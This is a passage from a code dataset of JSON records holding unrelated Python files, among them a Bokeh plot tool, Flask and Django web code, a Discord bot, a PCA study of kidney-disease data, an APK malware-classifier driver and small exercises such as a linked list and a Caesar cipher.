bokeh.core.properties import value\nfrom bokeh.models import ColumnDataSource, EditTool, Drag, Tap, CustomJS\nfrom bokeh.plotting import figure\nfrom bokeh.util.compiler import TypeScript\nfrom forest.barc import text_stamp\n\n#from bokeh.models.tools import FrontDrawTool\n\noutput_file('tool.html')\n\nclass FrontDrawTool(EditTool, Drag, Tap):\n __implementation__ = \"draw_tool.ts\"\n #source = Instance(ColumnDataSource)\n\nplot = figure(x_range=(0, 10), y_range=(0, 10))\n\n#plot.bezier(x0=[6.92,1.95], y0=[9.31,8.25], x1=[6.83,4.23], y1=[2.62,5.21], cx0=[2.17,3.15], cy0=[8.21,4.25], cx1=[1.73,2.47], cy1=[4.00,5.00])\n#source = ColumnDataSource(data=dict(xs=[6.92,1.95], ys=[9.31,8.25], x0=[6.92,1.95], y0=[9.31,8.25], x1=[6.83,4.23], y1=[2.62,5.21], cx0=[2.17,3.15], cy0=[8.21,4.25], cx1=[1.73,2.47], cy1=[4.00,5.00], angle=[None,None]))\n#source = ColumnDataSource(data=dict(xs=[None], ys=[None], x0=[None], y0=[None], x1=[None], y1=[None], cx0=[None], cy0=[None], cx1=[None], cy1=[None],angle=[None]))\nsource = ColumnDataSource(data=dict(xs=[], ys=[]))#, x0=[], y0=[], x1=[], y1=[], cx0=[], cy0=[], cx1=[], cy1=[],angle=[]))\nrenderers = [\n #order matters! Typescript assumes multiline, bézier, text_stamp\n plot.multi_line(xs='xs',ys='ys', color=\"#aaaaaa\", line_width=1, source=source),\n plot.bezier(x0='x0', y0='y0', x1='x1', y1='y1', cx0='cx0', cy0='cy0', cx1=\"cx1\", cy1=\"cy1\", source=ColumnDataSource(data=dict(x0=[], y0=[], x1=[], y1=[], cx0=[], cy0=[], cx1=[], cy1=[])), line_color=\"#d95f02\", line_width=2),\n plot.text_stamp(x='x', y='y', angle='angle', color=\"red\", text=value('▲'), source=ColumnDataSource(data=dict(x=[], y=[], angle=[])))\n]\n\nsource.js_on_change('data',\n CustomJS(args=dict(datasource =source), code=\"\"\"\n console.log(datasource.data);\n \"\"\"\n ));\n\nplot.add_tools(FrontDrawTool(renderers=renderers))\nplot.title.text = \"Draw on the plot\"\n#plot.bezier(x0=[6.92,1.95], y0=[9.31,8.25], x1=[6.83,4.23], y1=[2.62,5.21], cx0=[2.17,3.15], cy0=[8.21,4.25], cx1=[1.73,2.47], cy1=[4.00,5.00])\n\nshow(plot)\n","sub_path":"forest/barc/draw_tool.py","file_name":"draw_tool.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"643433963","text":"class Node: \n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass SLinkedList:\n def __init__(self):\n self.head = None\n\n def printList(self): \n temp = self.head \n while (temp): \n print (temp.data,end=\" \") \n temp = temp.next\n \n def atBegining(self,newData):\n newNode=Node(newData)\n newNode.next = self.head\n self.head = newNode\n\n def atEnd(self, newdata):\n newNode = Node(newdata)\n if self.head is None:\n self.head = newNode\n return\n last = self.head\n while(last.next):\n last = last.next\n last.next=newNode\n\n def InBetween(self,prevData,newdata):\n if self.head.next is None:\n print(\"The mentioned node is absent\")\n return\n temp = self.head\n curPos=self.head\n while (temp):\n if(temp.data==prevData):\n newNode = Node(newdata)\n newNode.next = curPos.next\n curPos.next=newNode\n temp=temp.next\n curPos=curPos.next\n \n def removeItem(self,removeData) :\n temp=self.head\n if(temp.data==removeData):\n temp=temp.next\n return\n while(temp):\n if(temp.data==removeData):\n break\n prev=temp\n temp=temp.next\n if(temp==None):\n return\n prev.next=temp.next\n temp=None\n\n def Inbetween(self,middle_node,newdata):\n if middle_node is None:\n print(\"The mentioned node is absent\")\n return\n\n NewNode = Node(newdata)\n NewNode.next = middle_node.next.next\n middle_node.next.next = NewNode\n\n def printNthItem(self,num):\n temp=self.head\n item=0\n while(temp != None):\n temp=temp.next\n item+=1\n if(item==num):\n print(\"\\nThe {}rd item from the list is {}\" .format(num, temp.data))\n\n def printNthItemrev(self,num):\n temp=self.head\n cnt=0\n while(temp != None):\n temp=temp.next\n cnt+=1\n temp = self.head\n for i in range(0,cnt-num):\n temp=temp.next\n print(temp.data)\n\n def pairwiseSwap(self): \n temp = self.head \n # There are no nodes in ilnked list \n if temp is None: \n return \n # Traverse furthur only if there are at least two \n # left \n while(temp is not None and temp.next is not None): \n # Swap data of node with its next node's data \n temp.data, temp.next.data = temp.next.data, temp.data \n # Move temo by 2 fro the next pair \n temp = temp.next.next\n \n \nlist1 = SLinkedList()\nlist1.head = Node(\"Mon\")\ne2 = Node(\"Tue\")\ne3 = Node(\"Wed\")\ne4 = Node(\"Jan\")\n\n# Link first Node to second node\nlist1.head.next = e2\n\n# Link second Node to third node\ne2.next = e3\ne3.next = e4\n#list1.printList()\nlist1.atBegining(\"Sun\")\nprint(\"\\n\")\n#list1.printList()\nprint(\"\\n\")\nlist1.atEnd(\"Sat\")\n#list1.printList()\nprint(\"\\n\")\nlist1.printList()\nprint(\"\\n\")\nlist1.Inbetween(list1.head.next,\"Fri\")\nlist1.printList()\nprint(\"\\n\")\nlist1.InBetween(\"Wed\",\"Thurs\")\nlist1.printList()\nprint(\"\\n\")\nlist1.removeItem(\"Wed\")\nlist1.printList()\nlist1.printNthItem(3)\nprint(\"\\n\")\nlist1.printNthItemrev(5)\nlist1.printList()\nprint(\"\\n\")\nlist1.pairwiseSwap()\nlist1.printList()\n","sub_path":"List/ListOperation.py","file_name":"ListOperation.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"223193224","text":"import shutil\n\nfrom diagnnose.extractors.base_extractor import Extractor\nfrom diagnnose.models.lm import LanguageModel\nfrom diagnnose.typedefs.activations import ActivationNames, RemoveCallback, SelectFunc\nfrom diagnnose.typedefs.corpus import Corpus\nfrom diagnnose.utils.misc import suppress_print\n\nBATCH_SIZE = 1024\n\n\n# @suppress_print\ndef simple_extract(\n model: LanguageModel,\n activations_dir: str,\n corpus: Corpus,\n activation_names: ActivationNames,\n selection_func: SelectFunc = lambda sen_id, pos, item: True,\n) -> RemoveCallback:\n \"\"\" Basic extraction method.\n\n Returns\n -------\n remove_activations : RemoveCallback\n callback function that can be executed at the end of a procedure\n that depends on the extracted activations. Removes all the\n activations that have been extracted. Takes no arguments.\n \"\"\"\n extractor = Extractor(model, corpus, activations_dir, activation_names)\n\n extractor.extract(\n batch_size=BATCH_SIZE, dynamic_dumping=True, selection_func=selection_func\n )\n\n def remove_activations():\n shutil.rmtree(activations_dir)\n\n return remove_activations\n","sub_path":"diagnnose/extractors/simple_extract.py","file_name":"simple_extract.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"159501634","text":"from pathlib import Path\n\nimport aiohttp\nimport discord\n\nfrom config import DiscordAPI\nfrom discord.ext import commands\n\n\nbot_prefix = commands.when_mentioned_or('Casper ', 'casper ')\nbot_description = \"\"\"Casper is a discord bot with a focus on character data\n aggregation for Blizzard Entertainment's World of Warcraft. \n It also has a variety of joke commands and fitness-related\n commands.\"\"\"\n\n\nclass CasperBot(commands.Bot):\n def __init__(self, *args, **kwargs):\n super().__init__(command_prefix=bot_prefix,\n description=bot_description,\n owner_id=DiscordAPI.OWNERID,\n *args, **kwargs)\n\n self.aiohttp_connector = aiohttp.TCPConnector(\n limit=2,\n force_close=True,\n enable_cleanup_closed=True\n )\n self.aiohttp_session = aiohttp.ClientSession(connector=self.aiohttp_connector)\n\n self.temp_shut_down = False\n\n @staticmethod\n async def on_ready():\n print('=============================================================\\n'\n 'Bot started. Loading cogs...')\n cogs_path = Path(__file__).parent / 'cogs'\n for sub_dir in cogs_path.iterdir():\n for cog in sub_dir.iterdir():\n if 'commands' in cog.name:\n try:\n casper_bot.load_extension(\n f'cogs.{sub_dir.name}.{cog.name.replace(\".py\", \"\")}')\n print(f'Loaded: cogs.{sub_dir.name}.{cog.name.replace(\".py\", \"\")}')\n except discord.ext.commands.errors.ExtensionAlreadyLoaded as e:\n print(f'Extension already loaded: {cog.name}')\n print('Finished loading all cogs.\\n'\n '=============================================================')\n\n @staticmethod\n async def on_command(ctx):\n \"\"\"\n This trigger is just for better error logging and troubleshooting.\n :param ctx:\n :return:\n \"\"\"\n print(f'=============================================================\\n'\n f'Command used:\\n'\n f'User: {ctx.author.name}\\n'\n f'Server: {ctx.guild}\\n'\n f'Channel: {ctx.message.channel}\\n'\n f'Command: {ctx.message.content}\\n'\n f'=============================================================')\n return\n\n\ncasper_bot = CasperBot()\n\n\n@casper_bot.event\nasync def on_message(message):\n if casper_bot.temp_shut_down and message.author.id != casper_bot.owner_id:\n return\n await casper_bot.process_commands(message)\n\n\n@casper_bot.command(hidden=True)\nasync def leave(ctx):\n if ctx.author.id == DiscordAPI.OWNERID:\n await ctx.guild.leave()\n print(f'Left guild: {ctx.guild.name}')\n\n\n@casper_bot.command(hidden=True)\nasync def where(ctx):\n if ctx.author.id == DiscordAPI.OWNERID:\n output = 'I\\'m currently in the following discord servers:\\n\\n'\n for guild in casper_bot.guilds:\n output += f'{guild.name}\\n'\n return await ctx.send(output)\n\n\n@casper_bot.command(hidden=True)\nasync def thanks(ctx):\n return await ctx.send('You\\'re welcome.')\n\n\n@casper_bot.command(hidden=True)\nasync def te(ctx):\n ...\n\n\n@casper_bot.command(hidden=True)\nasync def shutdown(ctx):\n if ctx.author.id == casper_bot.owner_id:\n casper_bot.temp_shut_down = True\n return await ctx.send('Shutting down.')\n else:\n return await ctx.send('No.')\n\n\n@casper_bot.command(hidden=True)\nasync def comeback(ctx):\n if ctx.author.id == casper_bot.owner_id:\n casper_bot.temp_shut_down = False\n return await ctx.send('I\\'m here.')\n else:\n return await ctx.send('No.')\n\n\nif __name__ == '__main__':\n casper_bot.run(DiscordAPI.TOKEN)\n","sub_path":"casper.py","file_name":"casper.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"82606659","text":"from flask import Blueprint, redirect, render_template, request, jsonify, send_from_directory, flash, url_for, json\nfrom flask_login import current_user, login_required\njobs_views = Blueprint('jobs_views', __name__, template_folder='../templates')\nfrom App.controllers import(get_jobs_json, get_jobs)\nfrom App.models import db, Jobs\nimport uuid\n\n\n#<----------------Render Admin Jobs Page and parses jobs------------->\n\n@jobs_views.route('/jobs_admin', methods=['GET'])\n@login_required\ndef coursesAdmin():\n jobs = get_jobs()\n return render_template('jobs_admin.html', jobs=jobs)\n\n#<----------Fixes Serialization Format------------------------------------->\n\ndef encoder_jobs(job):\n if isinstance(job, Jobs):\n return {'jobName':job.jobName, 'jobDescription': job.jobDescription, 'requirements':job.requirements\n }\n raise TypeError(f'Object{job} is not of type Jobs')\n\n#<---------------------------Insert Course Into Database------------------->\n\n@jobs_views.route('/insertJob', methods=['POST'])\n@login_required\ndef insertJob():\n jobname = request.form.get('jobname') \n jobdescription = request.form.get('jobdescription') \n requirements = request.form.get('requirements')\n \n #<----Data validation----->\n \n if (len(jobname) == 0 or len(jobname)>100 or not jobname.strip() or jobname.isdigit()):\n return \"\"\n if (len(jobdescription) == 0 or len(jobdescription) > 1000 or jobdescription.isdigit() or not jobdescription.strip()):\n return \"\"\n if (len(requirements) == 0 or len(requirements) >100 or requirements.isdigit() or not requirements.strip()):\n return \"\" \n else:\n newjob = Jobs(jobName=jobname, jobID=uuid.uuid4().int & 0xfffff, jobDescription=jobdescription, requirements=requirements) # create job object\n db.session.add(newjob) # save new job\n db.session.commit()\n return json.dumps(newjob.toDict())\n \n#<-------------------Delete Course----------------------->\n\n@jobs_views.route('/deleteJob/', methods=['GET'])\n@login_required\ndef delete_job(jobID):\n\n job = Jobs.query.get(jobID)# query course\n if job:\n db.session.delete(job)\n db.session.commit()\n return jobID\n return 'Unauthorized or job not found' ","sub_path":"App/views/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"542288499","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\ndef clickButton():\r\n messagebox.showinfo(\"요기제목\", \"요기내용\")\r\n\r\nwindow = Tk() #root = Tk()\r\n\r\nlabel1 = Label(window, text=\"파이썬 공부중~~\")\r\nlabel2 = Label(window, text=\"파이썬 공부중~~\", font=(\"궁서체\", 30), fg=\"blue\")\r\nlabel3 = Label(window, text=\"파이썬 \", bg= \"red\", width=20, height=5, anchor=SE)\r\n##anchor는 위치를 SE(South East)에 두자!!\r\n\r\nphoto = PhotoImage(file = \"C:/images/Pet_GIF/Pet_GIF(256x256)/etc15_256.gif\")\r\n## 사진을 준비해서\r\nlabel4 = Label(window, image = photo)\r\n## 사진에 띄어보자.\r\nbutton1 = Button(window, text=\"나를 눌러줘\", command = clickButton)\r\n##clickButton은 콜백함수인데, 콜백함수는 clickButton()을 하면 안됨.(python - 2019-06-11 typora 참고)\r\nbutton2 = Button(window, image=photo, command = clickButton)\r\n\r\n\r\n\r\nlabel1.pack(); label2.pack();label3.pack();label4.pack(side = LEFT);button1.pack();button2.pack()\r\n## side는 pack에 넣는다.\r\nwindow.mainloop()\r\n","sub_path":"강의자료/2019-06-11/Code05-01 GUI 02.py","file_name":"Code05-01 GUI 02.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"366053939","text":"# ********************************\r\n# module 4-Lab2\r\nimport math\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nfrom sklearn import preprocessing\r\nfrom sklearn.decomposition import PCA\r\nimport pandas as pd\r\npd.set_option('display.width', 300)\r\nplt.style.use('ggplot')\r\n\r\n\r\ndef scaleFeaturesDF(df):\r\n # Feature scaling is a type of transformation that only changes the\r\n # scale, but not number of features. Because of this, we can still\r\n # use the original dataset's column names... so long as we keep in\r\n # mind that the _units_ have been altered:\r\n\r\n scaled = preprocessing.StandardScaler().fit_transform(df)\r\n scaled = pd.DataFrame(scaled, columns=df.columns)\r\n\r\n print(\"New Variances:\\n\", scaled.var())\r\n print(\"New Describe:\\n\", scaled.describe())\r\n return scaled\r\n\r\n\r\ndef drawVectors(transformed_features, components_, columns, plt, scaled):\r\n if not scaled:\r\n return plt.axes() # No cheating ;-)\r\n\r\n num_columns = len(columns)\r\n\r\n # This funtion will project your *original* feature (columns)\r\n # onto your principal component feature-space, so that you can\r\n # visualize how \"important\" each one was in the\r\n # multi-dimensional scaling\r\n\r\n # Scale the principal components by the max value in\r\n # the transformed set belonging to that component\r\n xvector = components_[0] * max(transformed_features[:,0])\r\n yvector = components_[1] * max(transformed_features[:,1])\r\n\r\n ## visualize projections\r\n\r\n # Sort each column by it's length. These are your *original*\r\n # columns, not the principal components.\r\n important_features = { columns[i] : math.sqrt(xvector[i]**2 + yvector[i]**2) for i in range(num_columns) }\r\n important_features = sorted(zip(important_features.values(), important_features.keys()), reverse=True)\r\n print(\"Features by importance:\\n\", important_features)\r\n\r\n ax = plt.axes()\r\n\r\n for i in range(num_columns):\r\n # Use an arrow to project each original feature as a\r\n # labeled vector on your principal component axes\r\n plt.arrow(0, 0, xvector[i], yvector[i], color='b', width=0.0005, head_width=0.02, alpha=0.75)\r\n plt.text(xvector[i]*1.2, yvector[i]*1.2, list(columns)[i], color='b', alpha=0.75)\r\n\r\n return ax\r\n\r\n\r\n# Do * NOT * alter this line, until instructed!\r\n#scaleFeatures = False\r\nscaleFeatures = True\r\n\r\nfname = 'C:/Users/zkrunic/Documents/BigData/ML/Python/edx/'+ \\\r\n 'ProgrammingwithPythonforDataScienceDAT210x/'+ \\\r\n 'DAT210x-master/Module4/Datasets/kidney_disease.csv'\r\ndf = pd.read_csv(fname, index_col=0)\r\n\r\n#df = df.drop(['wheat_type'], 1)\r\n#\r\n# We use the following representation to collect the dataset\r\n# age - age\r\n# \tbp - blood pressure\r\n# \tsg - specific gravity\r\n# \tal - albumin\r\n# \tsu - sugar\r\n# \trbc - red blood cells\r\n# \tpc - pus cell\r\n# \tpcc - pus cell clumps\r\n# \tba - bacteria\r\n# \t*** bgr - blood glucose random ********************\r\n# 10. Blood Glucose Random(numerical)\r\n# bgr in mgs/dl\r\n#\r\n# \tbu - blood urea\r\n# \tsc - serum creatinine\r\n# \tsod - sodium\r\n# \tpot - potassium\r\n# \themo - hemoglobin\r\n# \tpcv - packed cell volume\r\n# \t**** wc - white blood cell count ********************\r\n# 17. White Blood Cell Count(numerical)\r\n# \t wc in cells/cumm\r\n# \t**** rc - red blood cell count ********************\r\n# 18. Red Blood Cell Count(numerical)\r\n# \t rc in millions/cmm\r\n# \thtn - hypertension\r\n# \tdm - diabetes mellitus\r\n# \tcad - coronary artery disease\r\n# \tappet - appetite\r\n# \tpe - pedal edema\r\n# \tane - anemia\r\n# \tclass - class\r\n#\r\n\r\n\r\n\r\ndf = df.dropna(axis=0)\r\ndf.reset_index()\r\ndf.isnull().sum()\r\ndf.dtypes\r\ndf.describe()\r\ndf.pcv = df.pcv.astype(int)\r\ndf.wc = df.wc.astype(int)\r\ndf.rc = df.rc.astype(float)\r\nlabels = ['red' if i=='ckd' else 'green' for i in df.classification]\r\ndf.drop(['classification', 'rbc', 'pc', 'pcc', 'ba'\r\n , 'htn', 'dm', 'cad', 'appet', 'pe', 'ane'], 1, inplace=True)\r\n\r\ndf3 = df\r\ndf3.isnull().sum()\r\n\r\ndf3.describe()\r\ndf3.var().sort_values(ascending=False)\r\n\r\nif scaleFeatures: df3 = scaleFeaturesDF(df3)\r\n\r\npca = PCA(n_components=2, svd_solver='full')\r\npca.fit(df3)\r\nPCA(copy=True, n_components=2, whiten=False)\r\nT = pca.transform(df3)\r\ndf3.shape\r\n(430, 6) # 430 Student survey responses, 6 questions..\r\nT.shape\r\n(430, 2) # 430 Student survey responses, 2 principal components..\r\n\r\n# Since we transformed via PCA, we no longer have column names; but we know we\r\n# are in `principal-component` space, so we'll just define the coordinates accordingly:\r\nax = drawVectors(T, pca.components_, df3.columns.values, plt, scaleFeatures)\r\nT = pd.DataFrame(T)\r\n\r\nT.columns = ['component1', 'component2']\r\nT.plot.scatter(x='component1', y='component2', marker='o', c=labels, alpha=0.75, ax=ax)\r\n\r\nplt.show()\r\n\r\n\r\n","sub_path":"mod4Lab3.py","file_name":"mod4Lab3.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"411484704","text":"list1=[]\nfor i in range(9):\n list1.append( int(input()) )\n\nmaxNum = max(list1)\nmaxIndex = list1.index( maxNum )\nprint(\"Index of the largest number {:d} is: ({:d}, {:d})\".format(maxNum, maxIndex//3, maxIndex%3 ))\nminNum = min(list1)\nminIndex = list1.index( minNum )\nprint(\"Index of the smallest number {:d} is: ({:d}, {:d})\".format(minNum, minIndex//3, minIndex%3))\n","sub_path":"重複練習/t608.py","file_name":"t608.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"493235385","text":"import os\nfrom flask_restful import Resource, marshal\nfrom flask_restful import request\nfrom api.models.auth.user_address import UserAddress\nfrom api.schemas.users import users_address_schema, users_address_schema2\nfrom api.validators.signup import SignupAddress\nfrom api.validators.signup2 import SignupAddress as SignupAddress2\nfrom api.common.decorators import jwt_required, log\nfrom api.validators.signup_constants import convert_str_to_bool\n\nclass UserAddresses(Resource):\n\n @jwt_required\n @log('Endereço criado com sucesso!')\n def post(self):\n try:\n user_id = request.user.id\n request_json = request.json\n form_version = int(os.environ.get('FORM_VERSION', 1))\n if form_version == 1:\n validator = SignupAddress(**request_json)\n elif form_version == 2:\n validator = SignupAddress2(**request_json)\n else:\n validator = SignupAddress(**request_json)\n\n if validator.validate_on_submit():\n request_json[\"user_id\"] = user_id\n if form_version == 2:\n request_json['correspondence'] = convert_str_to_bool(request_json, 'correspondence')\n request_json['check_business_address'] = convert_str_to_bool(request_json, 'check_business_address')\n user_address = UserAddress(**request_json)\n user_address.save()\n schema = users_address_schema if form_version == 1 else users_address_schema2\n return marshal(user_address, schema), 201\n return validator.errors, 500\n except Exception as e:\n return {'message': str(e)}, 500\n\n @jwt_required\n def get(self):\n try:\n user_id = request.user.id\n addresses = UserAddress.query.filter_by(user_id=user_id).all()\n form_version = int(os.environ.get('FORM_VERSION', 1))\n schema = users_address_schema if form_version == 1 else users_address_schema2\n if addresses:\n response = []\n for address in addresses:\n response.append(marshal(address, schema))\n return response, 200\n\n return {'message': 'Not Found'}, 404\n except Exception as e:\n print(e)\n return {'message': str(e)}, 500\n","sub_path":"Allgoo/api-andbank/api/resources/user_addresses.py","file_name":"user_addresses.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"348150834","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#ke @ 2016\n\nfrom FeatureInfo import runFeatureInfo\nfrom AppInfo import runApkInfo\nfrom TrainAndPredict import runTrainAndPredict\nfrom GetMLPara import runML\nimport Global\nimport argparse\nimport sys\n\n\ndef parse_options():\n parser = argparse.ArgumentParser(description=\"running analysis...\", prefix_chars='-+/')\n\n parser.add_argument('-w', action=\"store_false\", default=None,\n help='Turn whole-program-analysis off, use regions for classification')\n parser.add_argument('+w', action=\"store_true\", default=None,\n help='Turn whole-program-analysis on, ignore code structure')\n\n parser.add_argument('-a', '--apkinfo', action='store_true',default=False, help='get Application information')\n parser.add_argument('-f', '--feainfo', action='store_true',default=False, help='get Feature information' )\n parser.add_argument('-m', '--mlparameters', action='store_true',default=False,\n help='show how we choose a machine learning algorithm based on ROC and precision-recall curves.' )\n\n parser.add_argument('-p', '--predict', type=str, help='predict a tested apk: 1-malicious 0-benign [0-1]: malicious score' )\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n\n\n input_file =\"apks/com.andromo.dev4168.app4242.apk\"\n args = parse_options()\n\n print (args)\n\n if args.w :\n Global.WHOLE_PROGRAM_ANALYSIS = True\n else:\n Global.WHOLE_PROGRAM_ANALYSIS = False\n\n\n if args.mlparameters:\n runML()\n\n\n input_file = args.predict\n\n if input_file == None:\n print (\"No apk input, system exit\")\n sys.exit(0)\n\n if args.apkinfo:\n runApkInfo(input_file)\n if args.feainfo:\n runFeatureInfo(input_file)\n\n\n runTrainAndPredict(input_file)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"61279350","text":"import json\nfrom nltk.tokenize import RegexpTokenizer\n\nmoney1 = [\"week\", \"ramen\", \"paycheck\", \"work\", \"couple\", \"rice\",\n\"check\", \"pizza\", \"grocery\",\"rent\", \"anyone\", \"favor\",\n\"someone\",\"bill\",\"money\"]\n\t\nmoney2 = [\"food\", \"money\", \"house\", \"bill\", \"rent\", \"stamp\", \"month\",\n\"today\", \"parent\", \"help\", \"pizza\", \"someone\", \"anything\"\n\"mom\", \"anyone\"]\n\njob = [\"job\", \"month\", \"rent\", \"year\", \"interview\", \"bill\", \"luck\",\n\"school\", \"pizza\", \"paycheck\", \"unemployment\",\n\"money\", \"ramen\", \"end\", \"check\"]\n\nfamily = [\"tonight\", \"night\", \"today\", \"tomorrow\", \"someone\",\n\"anyone\", \"friday\", \"dinner\", \"something\", \"account\",\n\"family\", \"bank\", \"anything\", \"home\", \"work\"] #also includes time\n\ninstanceCounts = {\"countMoney1\": 0,\"countMoney2\": 0,\"countJob\": 0,\"countFamily\": 0}\n\njsonFile=open(\"C:\\\\Users\\\\Tom\\\\Downloads\\\\train.json\\\\train.json\").read()\ntrainData = json.loads(jsonFile)\n\ntokenizer = RegexpTokenizer('[A-Za-z]+') \n\nfor record in trainData:\n instanceCounts[\"countMoney1\"] = 0\n instanceCounts[\"countMoney2\"] = 0\n instanceCounts[\"countJob\"] = 0\n instanceCounts[\"countFamily\"] = 0\n recordContents = record['request_text_edit_aware']\n recordContents = tokenizer.tokenize(recordContents)\n for line in recordContents:\n if line in money1:\n instanceCounts[\"countMoney1\"] += 1\n if line in money2:\n instanceCounts[\"countMoney2\"] += 1\n if line in job:\n instanceCounts[\"countJob\"] += 1\n if line in family:\n instanceCounts[\"countFamily\"] += 1\n record.update(instanceCounts)\n\noutFile = open(\"trainOutput.json\",\"w\")\njson.dump(trainData,outFile,sort_keys = True, indent = 4)\noutFile.close\n \n","sub_path":"raop/featureextract/features-narratives.py","file_name":"features-narratives.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102715897","text":"# -*- coding: latin-1 -*-\nnamelist = ['famid', 'seq', 'nom', 'prenom', 'no', 'rue', 'app',\n 'ville', 'prov', 'residence', 'bureau', 'postal', 'naissance',\n 'age', 'sexe', 'courriel', 'carte', 'telephone', 'expiration',\n 'reponse', 'actc', 'activite', 'remarque', 'am']\nexcelout = ['prenom', 'nom']\nnumlist = [0, 2, 4, 8, 10, 11, 12, 13, 14, 16, 18, 20, 21, 23,\n 24, 26, 28, 30, 31, 33, 35, 36, 37, 39]\ncolpage1 = ['Nom', 'Adresse', 'Sexe', 'Age', 'Lun', 'Mar',\n 'Mer', 'Jeu', 'Ven', 'Quitte seul/vfi']\ncolpage2 = ['Nom', 'Telephone', 'Appel parent', 'Maladie, allergie, medicaments, etc']\nmastervar = ['Famid', 'Nom', 'Telephone', 'Travail', 'Adresse', 'Naissance', 'S', 'Grp']\nliste = 'newlist.xls'\naddmemb = 'addlist.xls'\noutxlsfile = 'listegrp.xls'\nspecChars = {'-': ' ', 'É': 'E', 'À': 'A', 'È': 'E', 'Ù': 'U', 'Û': 'U',\n 'Ô': 'O', 'Î': 'I', 'Ê': 'E', 'Â': 'A', 'Ï': 'I', 'Ë': 'E',\n 'Ç': 'C', 'Á': 'A', 'Ê': 'E', 'Ó': 'O'}\n","sub_path":"var.py","file_name":"var.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"508869057","text":"# iteradores (iterators)\n# é um objeto que contém um conjunto de valores\n# podemos percorer os valores desse objeto\n# lista = [num for num in range(10)]\n# [num for num in lista]\n\n# # iterator is iterable\n# numeros = [num for num in range(1, 4)]\n# it = iter(numeros)\n# print(next(it)) # 1\n# print(next(it)) # 2\n# print(next(it)) # 3\n#\n# # string também são iteraveis\n# palavra = 'Erickson'\n# it = iter(palavra)\n# print(next(it)) # E\n# print(next(it)) # r\n# print(next(it)) # i\n\n\n# # criar um iterator\n# class numeros:\n# # se a função for iter ele armazena o valor\n# def __iter__(self):\n# self.a = 0\n# return self\n#\n# # se a função for next ele adiciona 2 ao valor de a, que nesse caso foi passado 0\n# def __next__(self):\n# self.a += 2\n# return self.a\n#\n#\n# n = numeros()\n# it = iter(n)\n# print(next(it))\n# print(next(it))\n# print(next(it))\n# print(next(it))\n# print(next(it))\n\n\n# Stop interation\nclass numeros:\n def __iter__(self):\n self.numero = 0\n return self\n\n def __next__(self):\n if self.numero < 10: # Se o numero que começa em 0 for menor que 0, executa..\n self.numero += 1\n return self.numero\n else: # caso contrario para o código\n raise StopIteration\n\n\nnum = numeros()\nit = iter(num)\n\nfor numero in it:\n print(numero)\n\n","sub_path":"Cursos Python/Python 3 - João ribeiro/(Parte - 4) iteráveis com classes.py","file_name":"(Parte - 4) iteráveis com classes.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"356657851","text":"#BREXIT\n#FVIBMX\n\ndef cypher(text, shift_val):\n \"\"\"Inputs text and value you want to shift the characters and outputs the encoded language\"\"\"\n\n answer = \"\"\n \n text = text.upper()\n for i in (text):\n letnum = ord(i) + shift_val\n if letnum > 90:\n letnum = 64 + (letnum - 90)\n answer += chr(letnum)\n print(answer)\n \ndef decypher(text, shift_val):\n \"\"\"Inputs cypher text and value you want to shift the characters and outputs the decoded language\"\"\"\n\n answer = \"\"\n \n text = text.upper()\n for i in (text):\n letnum = ord(i) - shift_val\n if letnum < 65:\n letnum = 90 + (letnum - 64)\n answer += chr(letnum)\n \n print(answer)\n\ndef bruteforce(text):\n \"\"\"Goes through all combinations possible for a caesar cypher text\"\"\"\n for i in range(1,27):\n decypher(text,i)\n","sub_path":"Caesar_Cipher.py","file_name":"Caesar_Cipher.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"203823459","text":"from django.db import models\n\n\nclass Land(models.Model):\n title = models.CharField('заголовок на главной', max_length=100)\n sub_title = models.CharField('меньший заголовок главной', max_length=100)\n text = models.TextField('текст на главной')\n picture = models.ImageField('Картинка на главной', upload_to='ecoc/photos/')\n title_second = models.CharField('заголовок третьей сноски', max_length=100)\n title_head = models.CharField('заголовок третьей сноски 1', max_length=100)\n sub_line = models.CharField('строка sub', max_length=100)\n about_line = models.CharField('строка с описанием ', max_length=100)\n title_head1 = models.CharField('заголовок третьей сноски 2', max_length=100)\n sub_line1 = models.CharField('строка sub', max_length=100)\n about_line1 = models.CharField('строка с описанием ', max_length=100)\n title_head2 = models.CharField('заголовок третьей сноски 3', max_length=100)\n sub_line2 = models.CharField('строка sub', max_length=100)\n about_line2 = models.CharField('строка с описанием ', max_length=100)\n title_1 